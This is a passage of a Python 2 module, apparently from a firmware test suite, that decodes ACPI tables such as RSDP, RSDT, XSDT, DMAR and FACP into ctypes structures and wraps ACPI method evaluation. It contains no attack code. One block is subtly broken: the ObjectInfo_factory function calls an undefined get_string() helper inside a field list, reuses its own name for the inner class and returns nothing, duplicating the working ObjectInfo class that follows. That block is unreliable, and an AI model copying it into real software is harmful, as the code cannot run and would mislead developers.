if issubclass(type(data), (bits.cdata.Struct, bits.cdata.Union)):
return tuple(ctypes_to_python(getattr(data, f[0])) for f in data._fields_)
return data
def make_resources(data):
if data is None:
return None
if isinstance(data, tuple):
return tuple(make_resources(v) for v in data)
if isinstance(data, AcpiBuffer):
return parse_descriptor(data)
return data
def _acpi_object_from_python(obj):
if isinstance(obj, (int, long)):
return (ACPI_TYPE_INTEGER, obj)
# Must check AcpiBuffer before str, since AcpiBuffer derives from str
if isinstance(obj, AcpiBuffer):
return (ACPI_TYPE_BUFFER, obj)
if isinstance(obj, str):
return (ACPI_TYPE_STRING, obj)
if isinstance(obj, AcpiPower):
return (ACPI_TYPE_POWER, obj)
if isinstance(obj, AcpiProcessor):
return (ACPI_TYPE_PROCESSOR, obj)
# Must check tuple after any namedtuples, since namedtuples derive from tuple
if isinstance(obj, tuple):
return (ACPI_TYPE_PACKAGE, tuple(_acpi_object_from_python(arg) for arg in obj))
def evaluate(pathname, *args, **kwargs):
"""Evaluate an ACPI method and return the result.
By default, ACPI method evaluation allows reads and writes of I/O ports.
Pass the keyword argument unsafe_io=False to silently ignore I/O
operations."""
global acpi_unsafe_io
unsafe_io = kwargs.get("unsafe_io")
if unsafe_io is not None:
old_unsafe_io = acpi_unsafe_io
acpi_unsafe_io = unsafe_io
try:
return _acpi_object_to_python(_acpi._eval(pathname, tuple(_acpi_object_from_python(arg) for arg in args)))
finally:
if unsafe_io is not None:
acpi_unsafe_io = old_unsafe_io
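# Usage sketch (method paths are illustrative only); unsafe_io=False makes I/O
# port reads/writes during evaluation silently ignored, per the docstring above:
#   status = evaluate("\\_SB.PCI0.LPCB._STA")
#   resources = evaluate("\\_SB.PCI0._CRS", unsafe_io=False)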
acpi_object_types = {
ACPI_TYPE_INTEGER: 'ACPI_TYPE_INTEGER',
ACPI_TYPE_STRING: 'ACPI_TYPE_STRING',
ACPI_TYPE_BUFFER: 'ACPI_TYPE_BUFFER',
ACPI_TYPE_PACKAGE: 'ACPI_TYPE_PACKAGE',
ACPI_TYPE_FIELD_UNIT: 'ACPI_TYPE_FIELD_UNIT',
ACPI_TYPE_DEVICE: 'ACPI_TYPE_DEVICE',
ACPI_TYPE_EVENT: 'ACPI_TYPE_EVENT',
ACPI_TYPE_METHOD: 'ACPI_TYPE_METHOD',
ACPI_TYPE_MUTEX: 'ACPI_TYPE_MUTEX',
ACPI_TYPE_REGION: 'ACPI_TYPE_REGION',
ACPI_TYPE_POWER: 'ACPI_TYPE_POWER',
ACPI_TYPE_PROCESSOR: 'ACPI_TYPE_PROCESSOR',
ACPI_TYPE_THERMAL: 'ACPI_TYPE_THERMAL',
ACPI_TYPE_BUFFER_FIELD: 'ACPI_TYPE_BUFFER_FIELD',
ACPI_TYPE_DDB_HANDLE: 'ACPI_TYPE_DDB_HANDLE',
ACPI_TYPE_DEBUG_OBJECT: 'ACPI_TYPE_DEBUG_OBJECT',
ACPI_TYPE_LOCAL_REFERENCE: 'ACPI_TYPE_LOCAL_REFERENCE',
}
def ObjectInfo_factory(ids_length):
class object_info_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('current_status_valid', ctypes.c_uint8, 1),
('address_valid', ctypes.c_uint8, 1),
('hardware_id_valid', ctypes.c_uint8, 1),
('unique_id_valid', ctypes.c_uint8, 1),
('subsystem_id_valid', ctypes.c_uint8, 1),
('compatibility_id_valid', ctypes.c_uint8, 1),
('highest_dstates_valid', ctypes.c_uint8, 1),
('lowest_dstates_valid', ctypes.c_uint8, 1),
]
class object_info_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', object_info_flags_bits),
]
class current_status_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('present', ctypes.c_uint32, 1),
('enabled', ctypes.c_uint32, 1),
('visible', ctypes.c_uint32, 1),
('functional', ctypes.c_uint32, 1),
('battery_present', ctypes.c_uint32, 1),
]
class current_status_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', current_status_flags_bits),
]
class ObjectInfo_factory(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('info_size', ctypes.c_uint32),
('name', ctypes.c_char * 4),
('object_type', ctypes.c_uint32),
('parameter_count', ctypes.c_uint8),
('valid', ctypes.c_uint8),
('flags', object_info_flags),
('highest_dstates', ctypes.c_uint8 * 4),
('lowest_dstates', ctypes.c_uint8 * 5),
('current_status', current_status_flags),
('address', ctypes.c_uint64),
            ('hardware_id', get_string()),
            ('unique_id', get_string()),
            ('subsystem_id', get_string()),
('compatibility_id_count', ctypes.c_uint32),
('compatibility_id_length', ctypes.c_uint32),
('ids', ctypes.c_uint8 * ids_length),
]
_formats = {
'object_type': unpack.format_table("{}", acpi_object_types),
}
def get_string():
length, offset = u.unpack("IP")
if not length:
return None
return s.unpack_peek_one("{}x{}s".format(offset - addr, length)).split("\x00", 1)[0]
class ObjectInfo(unpack.Struct):
def __init__(self, data, addr):
super(ObjectInfo, self).__init__()
u = unpack.Unpackable(data)
s = unpack.Unpackable(data)
self.add_field('info_size', u.unpack_one("<I"))
self.add_field('name', u.unpack_one("4s"))
self.add_field('object_type', u.unpack_one("<I"), unpack.format_table("{}", acpi_object_types))
self.add_field('parameter_count', u.unpack_one("B"))
self.add_field('valid', u.unpack_one("B"))
self.add_field('current_status_valid', bool(bitfields.getbits(self.valid, 0)), "valid[0]={}")
self.add_field('address_valid', bool(bitfields.getbits(self.valid, 1)), "valid[1]={}")
self.add_field('hardware_id_valid', bool(bitfields.getbits(self.valid, 2)), "valid[2]={}")
self.add_field('unique_id_valid', bool(bitfields.getbits(self.valid, 3)), "valid[3]={}")
self.add_field('subsystem_id_valid', bool(bitfields.getbits(self.valid, 4)), "valid[4]={}")
self.add_field('compatibility_id_valid', bool(bitfields.getbits(self.valid, 5)), "valid[5]={}")
self.add_field('highest_dstates_valid', bool(bitfields.getbits(self.valid, 6)), "valid[6]={}")
self.add_field('lowest_dstates_valid', bool(bitfields.getbits(self.valid, 7)), "valid[7]={}")
self.add_field('flags', u.unpack_one("B"))
self.add_field('highest_dstates', tuple(u.unpack_one("B") for i in range(4)))
self.add_field('lowest_dstates', tuple(u.unpack_one("B") for i in range(5)))
self.add_field('current_status', u.unpack_one("<I"))
if self.current_status_valid:
self.add_field('present', bool(bitfields.getbits(self.current_status, 0)), "current_status[0]={}")
self.add_field('enabled', bool(bitfields.getbits(self.current_status, 1)), "current_status[1]={}")
self.add_field('visible', bool(bitfields.getbits(self.current_status, 2)), "current_status[2]={}")
self.add_field('functional', bool(bitfields.getbits(self.current_status, 3)), "current_status[3]={}")
self.add_field('battery_present', bool(bitfields.getbits(self.current_status, 4)), "current_status[4]={}")
# Deal with padding before the 8-byte address field
ptralign = struct.calcsize("I0P")
if u.offset % ptralign != 0:
u.skip(ptralign - (u.offset % ptralign))
self.add_field('address', u.unpack_one("<Q"))
def get_string():
length, offset = u.unpack("IP")
if not length:
return None
return s.unpack_peek_one("{}x{}s".format(offset - addr, length)).split("\x00", 1)[0]
self.add_field('hardware_id', get_string())
self.add_field('unique_id', get_string())
self.add_field('subsystem_id', get_string())
self.add_field('compatibility_id_count', u.unpack_one("<I"))
self.add_field('compatibility_id_length', u.unpack_one("<I"))
self.add_field('compatibility_ids', tuple(get_string() for i in range(self.compatibility_id_count)))
def scope(path):
try:
prefix, _ = path.rsplit('.', 1)
return prefix
except ValueError:
return "/"
def parse_table(signature, instance=1):
addr = get_table_addr(signature, instance)
if addr is None:
return None
signature = string.rstrip(signature,"!")
return globals()[signature](addr)
def make_compat_parser(signature):
def parse(printflag=False, instance=1):
table = parse_table(signature, instance)
if table is None:
return None
if printflag:
with ttypager.page():
print table
return table
return parse
class RSDP_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 8),
('checksum', ctypes.c_uint8),
('oemid', ctypes.c_char * 6),
('revision', ctypes.c_uint8),
('rsdt_address', ctypes.c_uint32),
]
class RSDP_v2(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(RSDP_v1._fields_) + [
('length', ctypes.c_uint32),
('xsdt_address', ctypes.c_uint64),
('extended_checksum', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
]
def RSDP(val):
"""Create class based on decode of an RSDP table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
r = RSDP_v1.from_address(addr)
cls = RSDP_v1
if r.revision == 2:
cls = RSDP_v2
if isinstance(val, str):
return cls.from_buffer_copy(data)
return cls.from_address(addr)
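# Usage sketch: RSDP() accepts either a physical address or a filename holding a
# raw table dump (the address and path below are illustrative only):
#   rsdp = RSDP(0xe0000)      # decode in place from memory
#   rsdp = RSDP("rsdp.bin")   # decode a dumped copy read from disk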
parse_rsdp = make_compat_parser("RSDP")
class TableHeader(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('signature', ctypes.c_char * 4),
('length', ctypes.c_uint32),
('revision', ctypes.c_ubyte),
('checksum', ctypes.c_ubyte),
('oemid', ctypes.c_char * 6),
('oemtableid', ctypes.c_char * 8),
('oemrevision', ctypes.c_uint32),
('creatorid', ctypes.c_char * 4),
('creatorrevision', ctypes.c_uint32),
]
def format_table_addrs(addrs):
return "(\n{})".format(",\n".join("{:#x} ({})".format(addr, (ctypes.c_char * 4).from_address(addr).raw) for addr in addrs))
def rsdt_factory(num_tables, no_formats=False):
formats = { 'tables': format_table_addrs, }
if no_formats:
formats = dict()
class RSDT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('tables', ctypes.c_uint32 * num_tables),
]
_formats = formats
return RSDT_v1
def RSDT(val):
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(TableHeader)) / ctypes.sizeof(ctypes.c_uint32)
if isinstance(val, str):
return rsdt_factory(num_tables, no_formats=True).from_buffer_copy(data)
return rsdt_factory(num_tables).from_address(addr)
parse_rsdt = make_compat_parser("RSDT")
def xsdt_factory(num_tables, no_formats=False):
formats = { 'tables': format_table_addrs, }
if no_formats:
formats = dict()
class XSDT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('tables', ctypes.c_uint64 * num_tables),
]
_formats = formats
return XSDT_v1
def XSDT(val):
"""Create class based on decode of an XSDT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(TableHeader)) / ctypes.sizeof(ctypes.c_uint64)
if isinstance(val, str):
return xsdt_factory(num_tables, no_formats=True).from_buffer_copy(data)
return xsdt_factory(num_tables).from_address(addr)
parse_xsdt = make_compat_parser("XSDT")
class DMARSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint16),
('length', ctypes.c_uint16),
]
class DMARDeviceScopePath(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pci_device', ctypes.c_uint8),
('pci_function', ctypes.c_uint8),
]
def DMARDeviceScope_factory(num_dev_scope_path):
class DMARDeviceScope(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('type', ctypes.c_uint8),
('length', ctypes.c_uint8),
('reserved', ctypes.c_uint16),
('enumeration_id', ctypes.c_uint8),
('start_bus_number', ctypes.c_uint8),
('paths', DMARDeviceScopePath * num_dev_scope_path),
]
return DMARDeviceScope
def dmar_device_scope_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
base_len_DMARDeviceScope = ctypes.sizeof(DMARDeviceScope_factory(0))
len_DMARDeviceScopePath = ctypes.sizeof(DMARDeviceScopePath)
while addr < end:
subtable_num += 1
subtable = DMARDeviceScope_factory(0).from_address(addr)
num_dev_scope_path = (subtable.length - base_len_DMARDeviceScope) / len_DMARDeviceScopePath
cls = DMARDeviceScope_factory(num_dev_scope_path)
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
class drhd_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('include_pci_all', ctypes.c_uint8, 1),
]
class drhd_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', drhd_flags_bits),
]
def DMARSubtableDRHD_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMARSubtableDRHD(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('flags', drhd_flags),
('reserved', ctypes.c_uint8),
('segment_number', ctypes.c_uint16),
('base_address', ctypes.c_uint64),
('device_scopes', subtables)
]
return DMARSubtableDRHD
def DMARSubtableRMRR_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMARSubtableRMRR(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('reserved', ctypes.c_uint16),
('segment_number', ctypes.c_uint16),
('base_address', ctypes.c_uint64),
('limit_address', ctypes.c_uint64),
('device_scopes', subtables),
]
return DMARSubtableRMRR
class atsr_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('all_ports', ctypes.c_uint8, 1),
]
class atsr_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', atsr_flags_bits),
]
def DMARSubtableATSR_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMARSubtableATSR(bits.cdata.Struct):
        _pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('flags', atsr_flags),
('reserved', ctypes.c_uint8),
('segment_number', ctypes.c_uint16),
('device_scopes', subtables),
]
return DMARSubtableATSR
class DMARSubtableRHSA(bits.cdata.Struct):
    _pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('reserved', ctypes.c_uint32),
('base_address', ctypes.c_uint64),
('proximity_domain', ctypes.c_uint32),
]
def DMARSubTableANDD_factory(obj_name_len):
class DMARSubTableANDD(bits.cdata.Struct):
        _pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('reserved', ctypes.c_uint8 * 3),
('device_num', ctypes.c_uint8),
('object_name', ctypes.c_char * obj_name_len),
]
return DMARSubTableANDD
def DMARSubtableUnknown_factory(data_len):
class DMARSubtableUnknown(bits.cdata.Struct):
        _pack_ = 1
_fields_ = copy.copy(DMARSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return DMARSubtableUnknown
ACPI_DMAR_TYPE_DRHD = 0
ACPI_DMAR_TYPE_RMRR = 1
ACPI_DMAR_TYPE_ATSR = 2
ACPI_DMAR_TYPE_RHSA = 3
ACPI_DMAR_TYPE_ANDD = 4
def dmar_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
base_len_DRHD = ctypes.sizeof(DMARSubtableDRHD_factory(list()))
base_len_RMRR = ctypes.sizeof(DMARSubtableRMRR_factory(list()))
base_len_ATSR = ctypes.sizeof(DMARSubtableATSR_factory(list()))
base_len_ANDD = ctypes.sizeof(DMARSubTableANDD_factory(0))
while addr < end:
subtable_num += 1
subtable = DMARSubtable.from_address(addr)
if subtable.subtype == ACPI_DMAR_TYPE_DRHD:
next_field_list = dmar_device_scope_list(addr + base_len_DRHD, subtable.length - base_len_DRHD)
cls = DMARSubtableDRHD_factory(next_field_list)
elif subtable.subtype == ACPI_DMAR_TYPE_RMRR:
next_field_list = dmar_device_scope_list(addr + base_len_RMRR, subtable.length - base_len_RMRR)
cls = DMARSubtableRMRR_factory(next_field_list)
elif subtable.subtype == ACPI_DMAR_TYPE_ATSR:
next_field_list = dmar_device_scope_list(addr + base_len_ATSR, subtable.length - base_len_ATSR)
cls = DMARSubtableATSR_factory(next_field_list)
elif subtable.subtype == ACPI_DMAR_TYPE_RHSA:
cls = DMARSubtableRHSA
elif subtable.subtype == ACPI_DMAR_TYPE_ANDD:
cls = DMARSubTableANDD_factory(subtable.length - base_len_ANDD)
else:
cls = DMARSubtableUnknown_factory(subtable.length - ctypes.sizeof(DMARSubtable))
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
class dmar_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('intr_remap', ctypes.c_uint8, 1),
('x2apic_opt_out', ctypes.c_uint8, 1),
]
class dmar_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', dmar_flags_bits),
]
def dmar_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class DMAR_v1(bits.cdata.Struct):
        _pack_ = 1
_fields_ = [
('header', TableHeader),
('host_addr_width', ctypes.c_uint8),
('flags', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 10),
('remapping_structures', subtables),
]
return DMAR_v1
def DMAR(val):
"""Create class based on decode of an DMAR table from address or filename."""
base_length = ctypes.sizeof(dmar_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = dmar_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return dmar_factory(field_list).from_buffer_copy(data)
return dmar_factory(field_list).from_address(addr)
parse_dmar = make_compat_parser("DMAR")
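# Example (a sketch): walk the decoded DMAR's remapping structures and report
# each DRHD's register base, using only the classes and constants defined above.
#   dmar = parse_dmar()
#   if dmar is not None:
#       for sub in dmar.remapping_structures:
#           if sub.subtype == ACPI_DMAR_TYPE_DRHD:
#               print "DRHD register base {:#x}".format(sub.base_address)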
class FixedFuncHwReg(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('Type', ctypes.c_uint8),
('VendorCode', ctypes.c_uint8),
('ClassCode', ctypes.c_uint8),
('Arg1', ctypes.c_uint8),
('Arg0', ctypes.c_uint64),
]
class GenericRegisterDescriptor(bits.cdata.Struct):
"""Generic Register Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('AddressSpaceId', ctypes.c_uint8),
('BitWidth', ctypes.c_uint8),
('BitOffset', ctypes.c_uint8),
('AccessSize', ctypes.c_uint8),
('Address', ctypes.c_uint64),
]
@property
def FFH(self):
if self.AddressSpaceId == ASID_FFH:
a = getattr(self.__class__, 'AddressSpaceId')
return FixedFuncHwReg.from_buffer(self, a.offset)
return None
def make_SingleRegisters(data):
if data is None:
return None
if isinstance(data, tuple):
if len(data) == 2:
if isinstance(data[0], GenericRegisterDescriptor):
if isinstance(data[1], EndTagDescriptor):
return SingleRegister(*data)
return tuple(make_SingleRegisters(v) for v in data)
return data
class SingleRegister(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('GenericRegister', GenericRegisterDescriptor),
('EndTag', EndTagDescriptor),
]
_preferred_pm_profile = {
0: 'Unspecified',
1: 'Desktop',
2: 'Mobile',
3: 'Workstation',
4: 'Enterprise Server',
5: 'SOHO Server',
6: 'Appliance PC',
7: 'Performance Server',
8: 'Tablet'
}
ASID_SYSTEM_MEMORY = 0
ASID_SYSTEM_IO = 1
ASID_PCI_CFG_SPACE = 2
ASID_EMBEDDED_CONTROLLER = 3
ASID_SMBUS = 4
ASID_PCC = 0xA
ASID_FFH = 0x7F
def _asid_str(asid):
if asid >= 0xC0 and asid <= 0xff:
return 'OEM Defined'
_asid = {
ASID_SYSTEM_MEMORY: 'System Memory',
ASID_SYSTEM_IO: 'System IO',
ASID_PCI_CFG_SPACE: 'PCI Configuration Space',
ASID_EMBEDDED_CONTROLLER: 'Embedded Controller',
ASID_SMBUS: 'SMBus',
ASID_PCC: 'Platform Communications Channel (PCC)',
ASID_FFH: 'Functional Fixed Hardware',
}
return _asid.get(asid, 'Reserved')
_access_sizes = {
0: 'Undefined',
1: 'Byte access',
2: 'Word access',
3: 'Dword access',
4: 'Qword access',
}
class GAS(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('address_space_id', ctypes.c_uint8),
('register_bit_width', ctypes.c_uint8),
('register_bit_offset', ctypes.c_uint8),
('access_size', ctypes.c_uint8),
('address', ctypes.c_uint64),
]
_formats = {
'address_space_id' : unpack.format_function("{:#x}", _asid_str),
'access_size' : unpack.format_table("{}", _access_sizes),
}
class facp_flags_bits_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('wbinvd', ctypes.c_uint32, 1),
('wbinvd_flush', ctypes.c_uint32, 1),
('proc_c1', ctypes.c_uint32, 1),
('p_lvl2_up', ctypes.c_uint32, 1),
('pwr_button', ctypes.c_uint32, 1),
('slp_button', ctypes.c_uint32, 1),
('fix_rtc', ctypes.c_uint32, 1),
('rtc_s4', ctypes.c_uint32, 1),
('tmr_val_ext', ctypes.c_uint32, 1),
('dck_cap', ctypes.c_uint32, 1),
]
class facp_flags_v1(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facp_flags_bits_v1),
]
class FACP_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('int_model', ctypes.c_uint8),
('reserved0', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('reserved1', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('reserved2', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('reserved3', ctypes.c_uint8 * 3),
('flags', facp_flags_v1),
]
class facp_flags_bits_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_flags_bits_v1._fields_) + [
('reset_reg_sup', ctypes.c_uint32, 1),
('sealed_case', ctypes.c_uint32, 1),
('headless', ctypes.c_uint32, 1),
('cpu_sw_slp', ctypes.c_uint32, 1),
('pci_exp_wak', ctypes.c_uint32, 1),
('use_platform_clock', ctypes.c_uint32, 1),
('s4_rtc_sts_valid', ctypes.c_uint32, 1),
('remote_power_on_capable', ctypes.c_uint32, 1),
('force_apic_cluster_mode', ctypes.c_uint32, 1),
('force_apic_physical_destination_mode', ctypes.c_uint32, 1),
]
class facp_flags_v3(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', facp_flags_bits_v3),
]
class facp_iapc_arch_bits_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('legacy_devices', ctypes.c_uint16, 1),
('8042', ctypes.c_uint16, 1),
('vga_not_present', ctypes.c_uint16, 1),
('msi_not_supported', ctypes.c_uint16, 1),
]
class facp_iapc_arch_v3(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', facp_iapc_arch_bits_v3),
]
class FACP_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('reserved0', ctypes.c_uint8),
('preferred_pm_profile', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('pstate_cnt', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('cst_cnt', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('iapc_boot_arch', facp_iapc_arch_v3),
('reserved1', ctypes.c_uint8),
('flags', facp_flags_v3),
('reset_reg', GAS),
('reset_value', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 3),
('x_firmware_ctrl', ctypes.c_uint64),
('x_dsdt', ctypes.c_uint64),
('x_pm1a_evt_blk', GAS),
('x_pm1b_evt_blk', GAS),
('x_pm1a_cnt_blk', GAS),
('x_pm1b_cnt_blk', GAS),
('x_pm2_cnt_blk', GAS),
('x_pm_tmr_blk', GAS),
('x_gpe0_blk', GAS),
('x_gpe1_blk', GAS),
]
_formats = {
'preferred_pm_profile': unpack.format_table("{}", _preferred_pm_profile),
}
class facp_iapc_arch_bits_v4(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_iapc_arch_bits_v3._fields_) + [
('pcie_aspm_controls', ctypes.c_uint16, 1),
]
class facp_iapc_arch_v4(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', facp_iapc_arch_bits_v4),
]
class FACP_v4(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('firmware_ctrl', ctypes.c_uint32),
('dsdt', ctypes.c_uint32),
('reserved0', ctypes.c_uint8),
('preferred_pm_profile', ctypes.c_uint8),
('sci_int', ctypes.c_uint16),
('smi_cmd', ctypes.c_uint32),
('acpi_enable', ctypes.c_uint8),
('acpi_disable', ctypes.c_uint8),
('s4bios_req', ctypes.c_uint8),
('pstate_cnt', ctypes.c_uint8),
('pm1a_evt_blk', ctypes.c_uint32),
('pm1b_evt_blk', ctypes.c_uint32),
('pm1a_cnt_blk', ctypes.c_uint32),
('pm1b_cnt_blk', ctypes.c_uint32),
('pm2_cnt_blk', ctypes.c_uint32),
('pm_tmr_blk', ctypes.c_uint32),
('gpe0_blk', ctypes.c_uint32),
('gpe1_blk', ctypes.c_uint32),
('pm1_evt_len', ctypes.c_uint8),
('pm1_cnt_len', ctypes.c_uint8),
('pm2_cnt_len', ctypes.c_uint8),
('pm_tmr_len', ctypes.c_uint8),
('gpe0_blk_len', ctypes.c_uint8),
('gpe1_blk_len', ctypes.c_uint8),
('gpe1_base', ctypes.c_uint8),
('cst_cnt', ctypes.c_uint8),
('p_lvl2_lat', ctypes.c_uint16),
('p_lvl3_lat', ctypes.c_uint16),
('flush_size', ctypes.c_uint16),
('flush_stride', ctypes.c_uint16),
('duty_offset', ctypes.c_uint8),
('duty_width', ctypes.c_uint8),
('day_alrm', ctypes.c_uint8),
('mon_alrm', ctypes.c_uint8),
('century', ctypes.c_uint8),
('iapc_boot_arch', facp_iapc_arch_v4),
('reserved1', ctypes.c_uint8),
('flags', facp_flags_v3),
('reset_reg', GAS),
('reset_value', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 3),
('x_firmware_ctrl', ctypes.c_uint64),
('x_dsdt', ctypes.c_uint64),
('x_pm1a_evt_blk', GAS),
('x_pm1b_evt_blk', GAS),
('x_pm1a_cnt_blk', GAS),
('x_pm1b_cnt_blk', GAS),
('x_pm2_cnt_blk', GAS),
('x_pm_tmr_blk', GAS),
('x_gpe0_blk', GAS),
('x_gpe1_blk', GAS),
]
_formats = {
'preferred_pm_profile': unpack.format_table("{}", _preferred_pm_profile),
}
class facp_flags_bits_v5(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(facp_flags_bits_v3._fields_) + [
('hw_reduced_acpi', ctypes.c_uint32, 1),
('low_power_s0_idle_capable', ctypes.c_uint32, 1),
]
class facp_flags_v5(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
